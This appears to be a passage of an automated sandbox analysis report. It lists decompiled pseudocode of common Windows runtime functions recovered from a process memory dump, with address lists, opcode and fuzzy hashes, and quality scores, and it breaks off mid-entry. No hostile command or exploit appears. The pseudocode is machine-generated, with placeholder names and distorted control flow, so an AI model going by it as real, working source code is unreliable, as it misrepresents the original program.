0x0345bcaf
0x0345bd2c
0x0345bd2c
0x0345bd09
0x00000000
0x0345bd09
0x0345bcb1
0x0345bcb5
0x0345bcbb
0x00000000
0x00000000
0x00000000
0x0345bcbb

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca57c8d5f27d15bac5c0421e1b5e1c382e0d7911d8c33c37e95da139a4af1294
Instruction ID: 4ce8f4c0a2d12ba3b381050273cf722c74a890fddd432380d3dced5d3e8e1e07
Opcode Fuzzy Hash: ca57c8d5f27d15bac5c0421e1b5e1c382e0d7911d8c33c37e95da139a4af1294
Instruction Fuzzy Hash: F331F536A006569FDB11EF58D480BA673A4FF18311F0540BAED44DF316E778DA0ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 03429100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03429100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x34ff6e8);
				E0347D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E034F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0347D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x35186c0; // 0xc01228
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x35186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03442280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E034F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0346AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x351b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x35184c0;
										if(_t69 >=  *0x35184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E034F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0342922A(_t82);
							_t53 = E03447D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E034F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x35186c0; // 0xc01228
								if(__eflags != 0) {
									__eflags = _t82 -  *0x35186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x35186bc;
										_t72 = 0x35186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03429240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x35186c4;
									_t72 = 0x35186c0;
									L18:
									E03459B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x03429100
0x03429100
0x03429100
0x03429100
0x03429102
0x03429107
0x0342910c
0x03429110
0x03429115
0x03429136
0x03429143
0x034837e4
0x034837e4
0x03429149
0x0342914e
0x0342914e
0x03429117
0x0342911d
0x00000000
0x00000000
0x0342911f
0x03429125
0x00000000
0x03429151
0x03429158
0x0342915d
0x03429161
0x03429168
0x03483715
0x00000000
0x0342916e
0x0342916e
0x03429175
0x03429177
0x0342917e
0x0342917f
0x03429182
0x03429182
0x03429187
0x03429187
0x0342918a
0x0342918d
0x0342918f
0x03429192
0x03429195
0x03429198
0x03429198
0x03429198
0x0342919a
0x00000000
0x00000000
0x0348371f
0x03483721
0x03483727
0x0348372f
0x03483733
0x03483735
0x03483738
0x0348373b
0x0348373d
0x03483740
0x00000000
0x00000000
0x03483746
0x03483749
0x00000000
0x00000000
0x0348374f
0x03483751
0x00000000
0x00000000
0x03483757
0x03483759
0x0348375c
0x0348375c
0x0348375e
0x0348375e
0x03483761
0x03483764
0x00000000
0x00000000
0x03483766
0x03483768
0x034837a3
0x034837a3
0x034837a5
0x034837a7
0x034837ad
0x034837b0
0x034837b2
0x034837bc
0x034837c2
0x034837c2
0x034837b2
0x03429187
0x03429187
0x0342918a
0x0342918d
0x0342918f
0x03429192
0x03429195
0x00000000
0x03429195
0x00000000
0x03429187
0x0348376a
0x0348376a
0x0348376c
0x0348376c
0x0348376f
0x03483775
0x00000000
0x00000000
0x03483777
0x03483779
0x00000000
0x00000000
0x03483782
0x03483787
0x03483789
0x03483790
0x03483790
0x0348378b
0x0348378b
0x0348378b
0x03483792
0x03483795
0x03483795
0x03483798
0x03483798
0x0348379b
0x0348379b
0x034291a3
0x034291a9
0x034291b0
0x034291b4
0x034291b4
0x034291bb
0x034291c0
0x034291c5
0x034291c7
0x034837da
0x034291cd
0x034291cd
0x034291cd
0x034291d2
0x034291d5
0x03429239
0x03429239
0x034291d7
0x034291db
0x034291e1
0x034291e7
0x034291fd
0x03429203
0x0342921e
0x03429223
0x00000000
0x03429223
0x03429205
0x03429208
0x0342920c
0x03429214
0x03429214
0x034291e9
0x034291e9
0x034291ee
0x034291f3
0x034291f3
0x034291f3
0x034291e7
0x00000000
0x034291db
0x03429187
0x03429168

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4b3e7eecca1c02440bb91d79461cc10f310d2dbc3e5ffe281f2fca4dd820f8
Instruction ID: 627cf1631a20cce8f54bff172a7ab64f542764a6e45c29c4b70abd52eeb64d58
Opcode Fuzzy Hash: 1f4b3e7eecca1c02440bb91d79461cc10f310d2dbc3e5ffe281f2fca4dd820f8
Instruction Fuzzy Hash: 6B319079A002549FEB25DF6AC488BADBBB1BB49310F5C855BC4147F351C370A990CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03451DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E03451DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0344F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03444620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0344F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x03451dc2
0x03451dc5
0x03451dc7
0x03451dcc
0x03451dce
0x03451dd6
0x03451ddf
0x03451de0
0x03451de1
0x03451de5
0x03451de8
0x03451def
0x03451df0
0x03451df6
0x03451df7
0x03451dfe
0x03451e1a
0x00000000
0x00000000
0x03451e0b
0x03451e12
0x03451e12
0x03451e00
0x03451e00
0x03451e05
0x03451e1e
0x03451e23
0x0349570f
0x03495713
0x00000000
0x00000000
0x03495719
0x03495719
0x03451e2c
0x03451e2d
0x03451e2e
0x03451e2f
0x03451e31
0x03451e32
0x03451e35
0x03451e3d
0x03495723
0x0349573d
0x0349573d
0x00000000
0x03495723
0x03451e49
0x03451e4e
0x03451e4e
0x03451e09
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: c05af1ac4d573fb1ceda4810accb47783203b164f85fe073f24f04757b6abe59
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 3F218D36A80218AFDB21CF59CC80FABFBB9EF85640F154066F9059F611D634AE01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03440050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03440050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x351d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03459ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0346B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E034F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03459702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x351b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x03440055
0x0344005d
0x03440062
0x0344006c
0x0344006f
0x03440074
0x0344007a
0x0344007a
0x03440080
0x03440080
0x03440087
0x0344008d
0x0344008f
0x03440093
0x03440095
0x0344009b
0x034400f8
0x034400fb
0x034400fc
0x034400ff
0x03440108
0x03440108
0x034400a2
0x034400a6
0x034400b3
0x034400bc
0x034400c5
0x034400ca
0x0348c01e
0x00000000
0x00000000
0x0348c02d
0x034400d5
0x034400d9
0x0348c03d
0x0348c046
0x0348c046
0x034400df
0x034400e2
0x034400ea
0x034400ef
0x034400f2
0x034400f6
0x03440111
0x03440117
0x03440117
0x00000000
0x034400f6
0x034400d0
0x034400d0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4baa5229733852d35b1431912dd0388a445487a252ad825525a6d75f24c052cb
Instruction ID: 967a2b891fd8bc79e7f5754c0436c0d3b0c1a7cf8404e86120ea709fe3120c84
Opcode Fuzzy Hash: 4baa5229733852d35b1431912dd0388a445487a252ad825525a6d75f24c052cb
Instruction Fuzzy Hash: 23317C31601B04DFD721DF28D840B5AF3E5FF89714F18856EE5968BB90DB75A802CB94

Uniqueness

Uniqueness Score: -1.00%

Function 034A6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E034A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03447D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3517b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03444620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0346F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03447D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03469AE0();
						_t23 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x034a6c0a
0x034a6c0f
0x034a6c10
0x034a6c13
0x034a6c15
0x034a6c19
0x034a6c1c
0x034a6c21
0x034a6c28
0x034a6c3a
0x034a6c2a
0x034a6c33
0x034a6c33
0x034a6c3f
0x034a6c48
0x034a6c4d
0x034a6c60
0x034a6c65
0x034a6c69
0x034a6c73
0x034a6c79
0x034a6c7f
0x034a6c86
0x034a6c90
0x034a6c94
0x034a6ca6
0x034a6cb2
0x034a6cbd
0x034a6cbd
0x034a6cc3
0x034a6cc7
0x034a6ccb
0x034a6cd0
0x034a6cd1
0x034a6ce2
0x034a6ce2
0x034a6c69
0x034a6ced

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28920804749d7e0611131740af3a333347e25c32f4e56e93fcf68933d1256c25
Instruction ID: fe39b57c4f4b3360067cb0e8ac4b29c21ac447f402486c3422381ace8fad1321
Opcode Fuzzy Hash: 28920804749d7e0611131740af3a333347e25c32f4e56e93fcf68933d1256c25
Instruction Fuzzy Hash: A1219AB5A00A44AFD711DF6DD880E6AB7A8FF48700F08006AF904CB790D738E911CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 034690AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E034690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0347D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0345E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03444620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0346F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0345A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x034690af
0x034690b8
0x034690bb
0x034690bf
0x034690c2
0x034690c2
0x034690c8
0x034690cb
0x034690cd
0x034a14d7
0x034a14eb
0x034a14eb
0x00000000
0x034a14eb
0x034a14db
0x034a14e6
0x00000000
0x034a14f2
0x034a14e8
0x00000000
0x034a14e8
0x034690d8
0x034690da
0x034690dd
0x034690e5
0x00000000
0x03469139
0x034690fa
0x034690fe
0x03469142
0x00000000
0x03469142
0x03469104
0x03469107
0x0346910b
0x03469110
0x03469118
0x03469147
0x03469148
0x0346914f
0x03469150
0x03469151
0x03469152
0x03469156
0x0346915d
0x03469160
0x03469168
0x0346916c
0x034691bc
0x034691be
0x00000000
0x034691be
0x0346916e
0x03469173
0x03469176
0x00000000
0x00000000
0x0346917c
0x03469180
0x034691b5
0x00000000
0x034691b5
0x03469182
0x03469185
0x03469189
0x00000000
0x00000000
0x0346918e
0x03469190
0x03469198
0x00000000
0x00000000
0x034691a0
0x00000000
0x034691ad
0x034691ad
0x034691b0
0x034691b1
0x00000000
0x03469185
0x0346911a
0x0346911c
0x0346911f
0x03469125
0x03469127
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 77f63ba1bcb992731b27dfbb9bd719a83fcd53e1902ded29cdff346f0c770a3d
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 66217C75A00704EFEB20DF59C944AAAF7F8EB54710F1488ABE999AF250D370A9408B95

Uniqueness

Uniqueness Score: -1.00%

Function 03453B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E03453B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x35184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x35184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x35184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0346AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0346FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x35184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x35184c4; // 0x0
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x03453b89
0x03453b96
0x03453ba1
0x03453bab
0x03453bb5
0x03453bb9
0x03496298
0x03453bbf
0x03453bc2
0x03453bc3
0x03453bc9
0x03453bca
0x03453bcc
0x03453bcd
0x03453bd4
0x03453bd6
0x03453bdb
0x03453bea
0x03453bf7
0x03453bfb
0x03453bff
0x03453c09
0x03453c0a
0x03453c0b
0x03453c0f
0x03453c14
0x03453c18
0x03453c18
0x03453bfb
0x03453c1b
0x03453c30
0x03453c30
0x03453c3d

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710aeb6fd272fc7baab113b32f77bf349d75c304c15fa67f78420a0fa79f152a
Instruction ID: d388cb41fe288fe36b14ebadea916e12d20894115bdde7cb7df164505484073c
Opcode Fuzzy Hash: 710aeb6fd272fc7baab113b32f77bf349d75c304c15fa67f78420a0fa79f152a
Instruction Fuzzy Hash: 9921B072A00204AFD711DF58CE81F5AB7BDFB40748F15046AE904AF252C771ED069B94

Uniqueness

Uniqueness Score: -1.00%

Function 034A6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E034A6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03447D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03447D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3405c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0345F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0345F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E034A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03442400( &_v52);
								}
								_t21 = L03442400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x034a6cfb
0x034a6d00
0x034a6d02
0x034a6d06
0x034a6d0a
0x034a6d0e
0x034a6d19
0x034a6d2b
0x034a6d1b
0x034a6d24
0x034a6d24
0x034a6d33
0x034a6d39
0x034a6d46
0x034a6d4f
0x034a6d61
0x034a6d51
0x034a6d5a
0x034a6d5a
0x034a6d69
0x034a6d6b
0x034a6d6d
0x034a6d6f
0x034a6d6f
0x034a6d74
0x034a6d79
0x034a6d7a
0x034a6d7f
0x034a6d82
0x034a6d88
0x034a6d89
0x034a6d90
0x034a6d94
0x034a6da7
0x034a6db1
0x034a6db1
0x034a6dbb
0x034a6dbb
0x034a6d90
0x034a6d69
0x034a6d46
0x034a6dc6

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8652555e942c159e04b6c9638ea47248f7765b9d6b15a898915ed11461cca169
